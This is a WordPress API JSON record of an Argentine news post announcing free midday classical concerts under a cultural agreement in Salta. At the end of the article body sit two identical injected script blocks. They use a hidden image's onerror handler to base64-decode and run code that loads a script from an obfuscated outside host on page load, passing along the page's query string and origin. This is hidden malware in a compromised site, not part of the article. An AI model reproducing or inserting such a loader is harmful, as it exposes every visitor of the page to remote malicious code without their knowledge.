{"id":4217,"date":"2024-07-23T10:03:02","date_gmt":"2024-07-23T13:03:02","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4217"},"modified":"2025-08-13T23:52:22","modified_gmt":"2025-08-14T02:52:22","slug":"la-secretaria-de-cultura-y-el-mozarteum-argentino-filial-salta-promueven-el-desarrollo-de-la-musica-clasica","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4217","title":{"rendered":"La Secretar\u00eda de Cultura y el Mozarteum Argentino Filial Salta promueven el desarrollo de la m\u00fasica cl\u00e1sica"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-6de2704c0d350e38fe0626288f22c956\" style=\"background-color:#6f021d\"><em>Para ello, firmar\u00e1n un convenio colectivo, con el objetivo de potenciar la formaci\u00f3n de nuevas audiencias. Luego de la r\u00fabrica, se dar\u00e1 lugar a la primera presentaci\u00f3n del ciclo \u201cConciertos Breves del Mediod\u00eda\u201d.<\/em><\/h3>\n\n\n\n<p>La&nbsp;<strong>Secretar\u00eda de Cultura de la Provincia<\/strong>, junto al Mozarteum Argentino Filial Salta, la Universidad Cat\u00f3lica de Salta, el Museo Hist\u00f3rico del Norte de la Secretar\u00eda de Cultura de la Naci\u00f3n, la Municipalidad de la Ciudad de Salta, la Escuela Superior de M\u00fasica Jos\u00e9 Lo Giudice, firmar\u00e1n un convenio colectivo para potenciar juntos la difusi\u00f3n del arte y la m\u00fasica en la Provincia.<\/p>\n\n\n\n<p>La r\u00fabrica se realizar\u00e1 hoy&nbsp;martes 23 de julio, a las 11, &nbsp;en el Cabildo de la Ciudad de Salta. Seguidamente tendr\u00e1 lugar la primera presentaci\u00f3n de \u201cConcierto Breve del Mediod\u00eda\u201d.<\/p>\n\n\n\n<p>La propuesta tiene por prop\u00f3sito acercar a un p\u00fablico al disfrute de la m\u00fasica cl\u00e1sica, en un formato breve, de manera libre y gratuita en espacios art\u00edsticos e hist\u00f3ricos de la ciudad de Salta.<\/p>\n\n\n\n<p>Asimismo, se dar\u00e1 a conocer el calendario y programa de los pr\u00f3ximos Conciertos Breves del Mediod\u00eda, que se ofrecer\u00e1n una vez al mes, los s\u00e1bados a mediod\u00eda, &nbsp;en distintas salas de teatros o museos del centro de la ciudad de Salta. Los conciertos de m\u00fasica de c\u00e1mara tendr\u00e1n una duraci\u00f3n aproximada de media hora y ser\u00e1n interpretados por alumnos avanzados de la Orquesta Infantil y Juvenil de la Provincia de Salta, la Escuela Superior de M\u00fasica Jos\u00e9 Lo Giudice y de la Escuela Universitaria de M\u00fasica de UCASAL. Tendr\u00e1n entrada libre y gratuita. &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Para ello, firmar\u00e1n un convenio colectivo, con el objetivo de potenciar la formaci\u00f3n de nuevas audiencias. Luego de la r\u00fabrica, se dar\u00e1 lugar a la primera presentaci\u00f3n del ciclo \u201cConciertos Breves del Mediod\u00eda\u201d. La&nbsp;Secretar\u00eda de Cultura de la Provincia, junto al Mozarteum Argentino Filial Salta, la Universidad Cat\u00f3lica de Salta, el Museo Hist\u00f3rico del Norte [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4218,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26],"tags":[],"class_list":{"0":"post-4217","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4217"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4217"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4217\/revisions"}],"predecessor-version":[{"id":6735,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4217\/revisions\/6735"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4218"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4217"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4217"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4217"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}